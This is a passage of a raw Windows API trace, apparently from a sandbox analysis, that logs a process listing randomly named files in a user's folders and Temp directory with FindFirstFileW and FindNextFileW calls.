nFileSizeLow=0x1584a, dwReserved0=0x0, dwReserved1=0x0, cFileName="ikU6TeOGYU.wav", cAlternateFileName="IKU6TE~1.WAV")) returned 1 [0221.693] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdfc7a950, ftCreationTime.dwHighDateTime=0x1d7e397, ftLastAccessTime.dwLowDateTime=0xd2af35a0, ftLastAccessTime.dwHighDateTime=0x1d7e6a1, ftLastWriteTime.dwLowDateTime=0xd2af35a0, ftLastWriteTime.dwHighDateTime=0x1d7e6a1, nFileSizeHigh=0x0, nFileSizeLow=0x12997, dwReserved0=0x0, dwReserved1=0x0, cFileName="iNv4KnvVdQ_-XbhT0.png", cAlternateFileName="INV4KN~1.PNG")) returned 1 [0221.693] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xffd2570, ftCreationTime.dwHighDateTime=0x1d7e503, ftLastAccessTime.dwLowDateTime=0xb1436270, ftLastAccessTime.dwHighDateTime=0x1d7e6c8, ftLastWriteTime.dwLowDateTime=0xb1436270, ftLastWriteTime.dwHighDateTime=0x1d7e6c8, nFileSizeHigh=0x0, nFileSizeLow=0x8984, dwReserved0=0x0, dwReserved1=0x0, cFileName="JbuoOpF29.wav", cAlternateFileName="JBUOOP~1.WAV")) returned 1 [0221.693] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x544ea3e0, ftCreationTime.dwHighDateTime=0x1d7e2ef, ftLastAccessTime.dwLowDateTime=0xec9d1930, ftLastAccessTime.dwHighDateTime=0x1d7e572, ftLastWriteTime.dwLowDateTime=0xec9d1930, ftLastWriteTime.dwHighDateTime=0x1d7e572, nFileSizeHigh=0x0, nFileSizeLow=0x6e1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="jJgM6v.swf", cAlternateFileName="")) returned 1 [0221.693] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x522d68b0, ftCreationTime.dwHighDateTime=0x1d7e43b, ftLastAccessTime.dwLowDateTime=0x11c81120, ftLastAccessTime.dwHighDateTime=0x1d7e716, ftLastWriteTime.dwLowDateTime=0x11c81120, ftLastWriteTime.dwHighDateTime=0x1d7e716, nFileSizeHigh=0x0, nFileSizeLow=0x4702, dwReserved0=0x0, dwReserved1=0x0, cFileName="KD79Kg.ots", cAlternateFileName="")) returned 1 [0221.693] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x490aa8f0, ftCreationTime.dwHighDateTime=0x1d7dfe1, ftLastAccessTime.dwLowDateTime=0xfe977f00, ftLastAccessTime.dwHighDateTime=0x1d7e17a, ftLastWriteTime.dwLowDateTime=0xfe977f00, ftLastWriteTime.dwHighDateTime=0x1d7e17a, nFileSizeHigh=0x0, nFileSizeLow=0x6de9, dwReserved0=0x0, dwReserved1=0x0, cFileName="kvg4 fbaULsO.bmp", cAlternateFileName="KVG4FB~1.BMP")) returned 1 [0221.693] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcb83e350, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xcb83e350, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xcb83e350, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0221.694] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1b30baa0, ftCreationTime.dwHighDateTime=0x1d7dd66, ftLastAccessTime.dwLowDateTime=0xaa479630, ftLastAccessTime.dwHighDateTime=0x1d7e051, ftLastWriteTime.dwLowDateTime=0xaa479630, ftLastWriteTime.dwHighDateTime=0x1d7e051, nFileSizeHigh=0x0, nFileSizeLow=0xd5a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="maFKZ1l2S-ZrrckNEk.csv", cAlternateFileName="MAFKZ1~1.CSV")) returned 1 [0221.694] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9ef2e1c0, ftCreationTime.dwHighDateTime=0x1d7df59, ftLastAccessTime.dwLowDateTime=0x46a66d10, ftLastAccessTime.dwHighDateTime=0x1d7e1f8, ftLastWriteTime.dwLowDateTime=0x46a66d10, ftLastWriteTime.dwHighDateTime=0x1d7e1f8, nFileSizeHigh=0x0, nFileSizeLow=0xf0db, dwReserved0=0x0, dwReserved1=0x0, cFileName="mGQW.swf", cAlternateFileName="")) returned 1 [0221.694] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc74ffad0, ftCreationTime.dwHighDateTime=0x1d7da2d, ftLastAccessTime.dwLowDateTime=0x7e9559c0, ftLastAccessTime.dwHighDateTime=0x1d7e00e, ftLastWriteTime.dwLowDateTime=0x7e9559c0, ftLastWriteTime.dwHighDateTime=0x1d7e00e, nFileSizeHigh=0x0, nFileSizeLow=0x1829e, dwReserved0=0x0, dwReserved1=0x0, cFileName="o7yH3LaZ4tw.bmp", cAlternateFileName="O7YH3L~1.BMP")) returned 1 [0221.695] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc73ddfa0, ftCreationTime.dwHighDateTime=0x1d7d8ff, ftLastAccessTime.dwLowDateTime=0xaf2d75b0, ftLastAccessTime.dwHighDateTime=0x1d7e552, ftLastWriteTime.dwLowDateTime=0xaf2d75b0, ftLastWriteTime.dwHighDateTime=0x1d7e552, nFileSizeHigh=0x0, nFileSizeLow=0xb092, dwReserved0=0x0, dwReserved1=0x0, cFileName="OnFMqEa.avi", cAlternateFileName="")) returned 1 [0221.695] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe56df930, ftCreationTime.dwHighDateTime=0x1d7dc90, ftLastAccessTime.dwLowDateTime=0x8a6bd2c0, ftLastAccessTime.dwHighDateTime=0x1d7dfd1, ftLastWriteTime.dwLowDateTime=0x8a6bd2c0, ftLastWriteTime.dwHighDateTime=0x1d7dfd1, nFileSizeHigh=0x0, nFileSizeLow=0x108f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="QEdX.gif", cAlternateFileName="")) returned 1 [0221.695] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd7229cf0, ftCreationTime.dwHighDateTime=0x1d7e5ff, ftLastAccessTime.dwLowDateTime=0x674ac7f0, ftLastAccessTime.dwHighDateTime=0x1d7e76b, ftLastWriteTime.dwLowDateTime=0x674ac7f0, ftLastWriteTime.dwHighDateTime=0x1d7e76b, nFileSizeHigh=0x0, nFileSizeLow=0x19be, dwReserved0=0x0, dwReserved1=0x0, cFileName="qjaQ71c_O33KsUOxuKe.jpg", cAlternateFileName="QJAQ71~1.JPG")) returned 1 [0221.695] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50c479f0, ftCreationTime.dwHighDateTime=0x1d7d7f2, ftLastAccessTime.dwLowDateTime=0xd4c01a60, ftLastAccessTime.dwHighDateTime=0x1d7db13, ftLastWriteTime.dwLowDateTime=0xd4c01a60, ftLastWriteTime.dwHighDateTime=0x1d7db13, nFileSizeHigh=0x0, nFileSizeLow=0x9c0f, dwReserved0=0x0, dwReserved1=0x0, cFileName="RN4wn84z2ATckzS.mp4", cAlternateFileName="RN4WN8~1.MP4")) returned 1 [0221.695] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x439394c0, ftCreationTime.dwHighDateTime=0x1d7dc87, ftLastAccessTime.dwLowDateTime=0x6eaaea20, ftLastAccessTime.dwHighDateTime=0x1d7e243, ftLastWriteTime.dwLowDateTime=0x6eaaea20, ftLastWriteTime.dwHighDateTime=0x1d7e243, nFileSizeHigh=0x0, nFileSizeLow=0x2ff1, dwReserved0=0x0, dwReserved1=0x0, cFileName="sFVU8VQDJccy.mp4", cAlternateFileName="SFVU8V~1.MP4")) returned 1 [0221.696] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x409c6c40, ftCreationTime.dwHighDateTime=0x1d7e152, ftLastAccessTime.dwLowDateTime=0x39af24b0, ftLastAccessTime.dwHighDateTime=0x1d7e28b, ftLastWriteTime.dwLowDateTime=0x39af24b0, ftLastWriteTime.dwHighDateTime=0x1d7e28b, nFileSizeHigh=0x0, nFileSizeLow=0x128bb, dwReserved0=0x0, dwReserved1=0x0, cFileName="t0LvOO2CEh2dNVMBUN.jpg", cAlternateFileName="T0LVOO~1.JPG")) returned 1 [0221.696] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2958c960, ftCreationTime.dwHighDateTime=0x1d7dca8, ftLastAccessTime.dwLowDateTime=0x2c31a20, ftLastAccessTime.dwHighDateTime=0x1d7dd03, ftLastWriteTime.dwLowDateTime=0x2c31a20, ftLastWriteTime.dwHighDateTime=0x1d7dd03, nFileSizeHigh=0x0, nFileSizeLow=0xcdd, dwReserved0=0x0, dwReserved1=0x0, cFileName="u2SemsU5T_mEvVKm3r.wav", cAlternateFileName="U2SEMS~1.WAV")) returned 1 [0221.696] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fc15740, ftCreationTime.dwHighDateTime=0x1d7e22a, ftLastAccessTime.dwLowDateTime=0x35fac500, ftLastAccessTime.dwHighDateTime=0x1d7e609, ftLastWriteTime.dwLowDateTime=0x35fac500, ftLastWriteTime.dwHighDateTime=0x1d7e609, nFileSizeHigh=0x0, nFileSizeLow=0x1262c, dwReserved0=0x0, dwReserved1=0x0, cFileName="uCWMH.swf", cAlternateFileName="")) returned 1 [0221.696] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe14ec20, ftCreationTime.dwHighDateTime=0x1d7e350, ftLastAccessTime.dwLowDateTime=0x64418a70, ftLastAccessTime.dwHighDateTime=0x1d7e398, ftLastWriteTime.dwLowDateTime=0x64418a70, ftLastWriteTime.dwHighDateTime=0x1d7e398, nFileSizeHigh=0x0, nFileSizeLow=0x3faa, dwReserved0=0x0, dwReserved1=0x0, cFileName="UkkP50TVPpbCSo56b1I9.bmp", cAlternateFileName="UKKP50~1.BMP")) returned 1 [0221.696] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd6dc1d80, ftCreationTime.dwHighDateTime=0x1d7e0ae, ftLastAccessTime.dwLowDateTime=0x87a2caf0, ftLastAccessTime.dwHighDateTime=0x1d7e664, ftLastWriteTime.dwLowDateTime=0x87a2caf0, ftLastWriteTime.dwHighDateTime=0x1d7e664, nFileSizeHigh=0x0, nFileSizeLow=0xef3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="vKVO1XSKvA.png", cAlternateFileName="VKVO1X~1.PNG")) returned 1 [0221.697] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5b632f80, ftCreationTime.dwHighDateTime=0x1d7dc45, ftLastAccessTime.dwLowDateTime=0x48fd6840, ftLastAccessTime.dwHighDateTime=0x1d7e2af, ftLastWriteTime.dwLowDateTime=0x48fd6840, ftLastWriteTime.dwHighDateTime=0x1d7e2af, nFileSizeHigh=0x0, nFileSizeLow=0x8bb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="VmFgiOIY03zWeF.pptx", cAlternateFileName="VMFGIO~1.PPT")) returned 1 [0221.697] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1b2458b0, ftCreationTime.dwHighDateTime=0x1d7de91, ftLastAccessTime.dwLowDateTime=0xf91bc530, ftLastAccessTime.dwHighDateTime=0x1d7e329, ftLastWriteTime.dwLowDateTime=0xf91bc530, ftLastWriteTime.dwHighDateTime=0x1d7e329, nFileSizeHigh=0x0, nFileSizeLow=0x182b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="WBDX.bmp", cAlternateFileName="")) returned 1 [0221.697] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x99411110, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0x99411110, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0x99411110, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WPDNSE", cAlternateFileName="")) returned 1 [0221.697] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7b7eedd0, ftCreationTime.dwHighDateTime=0x1d7dda4, ftLastAccessTime.dwLowDateTime=0xff941ba0, ftLastAccessTime.dwHighDateTime=0x1d7e0c3, ftLastWriteTime.dwLowDateTime=0xff941ba0, ftLastWriteTime.dwHighDateTime=0x1d7e0c3, nFileSizeHigh=0x0, nFileSizeLow=0xe5a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="XeOGUWW.gif", cAlternateFileName="")) returned 1 [0221.697] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x14624f80, ftCreationTime.dwHighDateTime=0x1d7e55f, ftLastAccessTime.dwLowDateTime=0x8005b7b0, ftLastAccessTime.dwHighDateTime=0x1d7e666, ftLastWriteTime.dwLowDateTime=0x8005b7b0, ftLastWriteTime.dwHighDateTime=0x1d7e666, nFileSizeHigh=0x0, nFileSizeLow=0x121a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="xZ1KJhdzKR6Yqg.m4a", cAlternateFileName="XZ1KJH~1.M4A")) returned 1 [0221.697] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9f282e20, ftCreationTime.dwHighDateTime=0x1d7e431, ftLastAccessTime.dwLowDateTime=0x3f9da370, ftLastAccessTime.dwHighDateTime=0x1d7e640, ftLastWriteTime.dwLowDateTime=0x3f9da370, ftLastWriteTime.dwHighDateTime=0x1d7e640, nFileSizeHigh=0x0, nFileSizeLow=0x9f08, dwReserved0=0x0, dwReserved1=0x0, cFileName="x_cMy.jpg", cAlternateFileName="")) returned 1 [0221.698] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2760670, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xd2760670, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xd2760670, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DF1465A4AEF7E2199D.TMP", cAlternateFileName="~DF146~1.TMP")) returned 1 [0221.698] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xd22e9d30, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xd22e9d30, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xd22e9d30, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DF24DDEEEC7F55E878.TMP", cAlternateFileName="~DF24D~1.TMP")) returned 1 [0221.698] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd22e9d30, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xd22e9d30, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xd22e9d30, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DF79E3E0FEAD5D8EA6.TMP", cAlternateFileName="~DF79E~1.TMP")) returned 1 [0221.698] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xd2760670, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xd2760670, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xd2760670, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DF8EBD431AC1E92770.TMP", cAlternateFileName="~DF8EB~1.TMP")) returned 1 [0221.698] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xccd5e690, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xccd5e690, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xccd5e690, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DFC4C8BA9F1B42FB44.TMP", cAlternateFileName="~DFC4C~1.TMP")) returned 1 [0221.698] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xcbc1c710, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xcbc1c710, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xcbc1c710, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DFE9C5F3265BA7C071.TMP", cAlternateFileName="~DFE9C~1.TMP")) returned 1 [0221.698] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0221.699] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef14) returned 1 [0221.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f174) returned 1 [0221.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f120) returned 1 [0221.699] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", nBufferLength=0x105, lpBuffer=0x36ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", lpFilePart=0x0) returned 0x25 [0221.700] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\*", lpFindFileData=0x36eed0 | out: lpFindFileData=0x36eed0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8970b3f0, ftLastAccessTime.dwHighDateTime=0x1d7fb6e, ftLastWriteTime.dwLowDateTime=0x8970b3f0, ftLastWriteTime.dwHighDateTime=0x1d7fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.700] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8970b3f0, ftLastAccessTime.dwHighDateTime=0x1d7fb6e, ftLastWriteTime.dwLowDateTime=0x8970b3f0, ftLastWriteTime.dwHighDateTime=0x1d7fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.700] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf69b5080, ftCreationTime.dwHighDateTime=0x1d7d994, ftLastAccessTime.dwLowDateTime=0x8ef35a90, ftLastAccessTime.dwHighDateTime=0x1d7e60f, ftLastWriteTime.dwLowDateTime=0x8ef35a90, ftLastWriteTime.dwHighDateTime=0x1d7e60f, nFileSizeHigh=0x0, nFileSizeLow=0xb25, dwReserved0=0x0, dwReserved1=0x0, cFileName="1cjgRvoiEw6P5.jpg", cAlternateFileName="1CJGRV~1.JPG")) returned 1 [0221.740] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x73e50720, ftCreationTime.dwHighDateTime=0x1d7dd5f, ftLastAccessTime.dwLowDateTime=0xefbefa0, ftLastAccessTime.dwHighDateTime=0x1d7e001, ftLastWriteTime.dwLowDateTime=0xefbefa0, ftLastWriteTime.dwHighDateTime=0x1d7e001, nFileSizeHigh=0x0, nFileSizeLow=0xfcd9, dwReserved0=0x0, dwReserved1=0x0, cFileName="2Ct3K- 1PWvP1.avi", cAlternateFileName="2CT3K-~1.AVI")) returned 1 [0221.740] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6f55dfa0, ftCreationTime.dwHighDateTime=0x1d7e542, ftLastAccessTime.dwLowDateTime=0x25b39530, ftLastAccessTime.dwHighDateTime=0x1d7e566, ftLastWriteTime.dwLowDateTime=0x25b39530, ftLastWriteTime.dwHighDateTime=0x1d7e566, nFileSizeHigh=0x0, nFileSizeLow=0x139f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="5_RT-JgEKQtcm.bmp", cAlternateFileName="5_RT-J~1.BMP")) returned 1 [0221.740] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8970b3f0, ftCreationTime.dwHighDateTime=0x1d7fb6e, ftLastAccessTime.dwLowDateTime=0x8970b3f0, ftLastAccessTime.dwHighDateTime=0x1d7fb6e, ftLastWriteTime.dwLowDateTime=0x898ae310, ftLastWriteTime.dwHighDateTime=0x1d7fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x374e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="663A.exe", cAlternateFileName="")) returned 1 [0221.740] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7995d960, ftCreationTime.dwHighDateTime=0x1d7df8f, ftLastAccessTime.dwLowDateTime=0xe6a5cf60, ftLastAccessTime.dwHighDateTime=0x1d7e403, ftLastWriteTime.dwLowDateTime=0xe6a5cf60, ftLastWriteTime.dwHighDateTime=0x1d7e403, nFileSizeHigh=0x0, nFileSizeLow=0x7c05, dwReserved0=0x0, dwReserved1=0x0, cFileName="7JmPPGJ8rPWeI2.ppt", cAlternateFileName="7JMPPG~1.PPT")) returned 1 [0221.741] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6f70bad0, ftCreationTime.dwHighDateTime=0x1d7dba3, ftLastAccessTime.dwLowDateTime=0x1b966300, ftLastAccessTime.dwHighDateTime=0x1d7dda2, ftLastWriteTime.dwLowDateTime=0x1b966300, ftLastWriteTime.dwHighDateTime=0x1d7dda2, nFileSizeHigh=0x0, nFileSizeLow=0x19da, dwReserved0=0x0, dwReserved1=0x0, cFileName="9OABWGhlJcE.png", cAlternateFileName="9OABWG~1.PNG")) returned 1 [0221.741] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x136a7180, ftCreationTime.dwHighDateTime=0x1d7db18, ftLastAccessTime.dwLowDateTime=0x8ffda840, ftLastAccessTime.dwHighDateTime=0x1d7e075, ftLastWriteTime.dwLowDateTime=0x8ffda840, ftLastWriteTime.dwHighDateTime=0x1d7e075, nFileSizeHigh=0x0, nFileSizeLow=0xce76, dwReserved0=0x0, dwReserved1=0x0, cFileName="ApXXdasLzpaI.jpg", cAlternateFileName="APXXDA~1.JPG")) returned 1 [0221.741] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa51ac520, ftCreationTime.dwHighDateTime=0x1d7e14f, ftLastAccessTime.dwLowDateTime=0x3bbae2a0, ftLastAccessTime.dwHighDateTime=0x1d7e3dd, ftLastWriteTime.dwLowDateTime=0x3bbae2a0, ftLastWriteTime.dwHighDateTime=0x1d7e3dd, nFileSizeHigh=0x0, nFileSizeLow=0x6c72, dwReserved0=0x0, dwReserved1=0x0, cFileName="bdpabOSJfvOVhwLK.mp4", cAlternateFileName="BDPABO~1.MP4")) returned 1 [0221.741] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x702772e0, ftCreationTime.dwHighDateTime=0x1d7dcaf, ftLastAccessTime.dwLowDateTime=0xc7d214c0, ftLastAccessTime.dwHighDateTime=0x1d7e1d0, ftLastWriteTime.dwLowDateTime=0xc7d214c0, ftLastWriteTime.dwHighDateTime=0x1d7e1d0, nFileSizeHigh=0x0, nFileSizeLow=0x556a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BZl_rK04.ots", cAlternateFileName="")) returned 1 [0221.741] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5a67980, ftCreationTime.dwHighDateTime=0x1d7de11, ftLastAccessTime.dwLowDateTime=0x42966b30, ftLastAccessTime.dwHighDateTime=0x1d7e76b, ftLastWriteTime.dwLowDateTime=0x42966b30, ftLastWriteTime.dwHighDateTime=0x1d7e76b, nFileSizeHigh=0x0, nFileSizeLow=0x4984, dwReserved0=0x0, dwReserved1=0x0, cFileName="c9u93Dn0bb.xlsx", cAlternateFileName="C9U93D~1.XLS")) returned 1 [0221.741] 